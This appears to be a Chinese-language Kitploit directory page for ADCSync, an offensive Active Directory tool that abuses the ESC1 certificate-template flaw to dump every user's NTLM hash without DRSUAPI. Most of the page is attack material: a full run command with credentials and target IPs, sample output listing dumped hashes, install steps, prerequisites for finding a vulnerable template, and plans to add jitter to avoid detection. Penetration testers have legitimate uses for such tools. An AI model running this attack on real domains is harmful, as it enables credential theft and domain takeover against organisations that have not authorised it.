Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ADCSync — 使用ESC1执行临时的DCSync并转储哈希 | Kitploit
工具/GitHubGitHub/jpg0mez/adcsync
密码破解漏洞利用渗透测试身份验证
GitHubjpg0mez/adcsync

ADCSync

使用ESC1执行临时的DCSync并转储哈希

查看仓库
2122432年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ADCSsync

这是我快速拼凑的一个工具,用于利用 ESC1 执行 DCSync。它速度相当慢,但提供了一种无需使用 DRSUAPI 或 卷影副本 即可执行临时的 DCSync 攻击的有效方法。

这是该工具的第一个版本,本质上只是自动化了对域中每个用户运行 Certipy 的过程。它还需要大量改进,我计划在未来添加更多功能,包括身份验证方法以及自动化查找易受攻击模板的流程。

root@kitploit:~
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___    ____  ___________
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/  |_/_____/\____//____/\__, /_/ /_/\___/
                         /____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00,  1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

简介

ADCSync 利用 ESC1 漏洞从 Active Directory 环境中的用户账户转储 NTLM 哈希。该工具首先从传入的 Bloodhound 转储文件中获取所有用户和域。然后使用 Certipy 为每个用户发起请求,并将他们的 PFX 文件存储在证书目录中。最后,使用 Certipy 通过证书进行身份验证,从而获取每个用户的 NT 哈希。此过程相当缓慢,可能需要较长时间才能完成,但它提供了一种替代方案来转储 NTLM 哈希。

安装

root@kitploit:~
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

使用说明

要使用此工具,我们需要以下条件:

  1. 有效的域凭据
  2. 从 Bloodhound 转储中获取的用户列表(将作为参数传入)
  3. 一个易受 ESC1 攻击的模板(可使用 certipy find 查找)
root@kitploit:~
# python3 adcsync.py --help
    ___    ____  ___________                 
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__  
/_/  |_/_____/\____//____/\__, /_/ /_/\___/  
                         /____/              

Usage: adcsync.py [OPTIONS]

Options:
  -f, --file TEXT      Input User List JSON file from Bloodhound  [required]
  -o, --output TEXT    NTLM Hash Output file  [required]
  -ca TEXT             Certificate Authority  [required]
  -dc-ip TEXT          IP Address of Domain Controller  [required]
  -u, --user TEXT      Username  [required]
  -p, --password TEXT  Password  [required]
  -template TEXT       Template Name vulnerable to ESC1  [required]
  -target-ip TEXT      IP Address of the target machine  [required]
  --help               Show this message and exit.

TODO

  • 支持其他身份验证方法,例如 NTLM 哈希和 ccache 文件
  • 自动运行 certipy find 来查找并获取易受 ESC1 攻击的模板
  • 增加抖动和休眠选项以避免检测
  • 为所有变量添加类型验证

致谢

  • puzzlepeaches:催促我赶紧写完这个工具
  • ly4k:感谢 Certipy
  • WazeHell:感谢用于搭建测试用脆弱 AD 环境的脚本
下载工具